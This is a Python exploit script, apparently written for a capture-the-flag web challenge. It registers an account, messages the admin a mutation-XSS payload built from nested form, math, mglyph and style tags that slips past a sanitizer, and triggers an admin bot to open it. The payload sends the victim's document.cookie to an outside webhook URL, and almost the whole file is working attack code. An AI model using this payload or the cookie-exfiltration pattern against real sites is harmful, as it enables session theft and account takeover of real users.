#!/usr/bin/env python3
"""
Simple single-payload test
"""

import requests
import time
import json

BASE_URL = "https://unrealistic-1-7e47fbb90382563c.chals.uoftctf.org"
WEBHOOK_URL = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

print("="*70)
print("SINGLE PAYLOAD TEST")
print("="*70)

# Register
username = f"pwn_{int(time.time())}"
password = "test123"

print(f"\n[1] Registering as {username}...")
resp = requests.post(
    f"{BASE_URL}/register",
    data={"username": username, "password": password},
    allow_redirects=False
)
print(f"    Status: {resp.status_code}")

if resp.status_code in [302, 303]:
    session_cookie = resp.cookies.get("session")
    print(f"    [+] Got session cookie!")
    
    # Send payload
    print(f"\n[2] Sending XSS payload...")
    payload = f'<form><math><mtext></form><form><mglyph><style></math><img src=x onerror=location="{WEBHOOK_URL}?flag="+document.cookie>'
    
    resp2 = requests.post(
        f"{BASE_URL}/compose",
        data={"to": "admin", "body": payload},
        cookies={"session": session_cookie},
        allow_redirects=False
    )
    print(f"    Status: {resp2.status_code}")
    if resp2.status_code == 303:
        print(f"    [+] Message sent!")
        
        # Trigger bot
        print(f"\n[3] Triggering bot...")
        resp3 = requests.post(
            f"{BASE_URL}/bot",
            data={"url": "http://127.0.0.1:5000/inbox"}
        )
        if "Bot ran" in resp3.text:
            print(f"    [+] Bot triggered!")
            print(f"\n[!] CHECK YOUR WEBHOOK: {WEBHOOK_URL}")
        else:
            print(f"    [-] Bot error: {resp3.text[:200]}")
    else:
        print(f"    [-] Send failed: {resp2.text[:200]}")
else:
    print(f"    [-] Registration failed")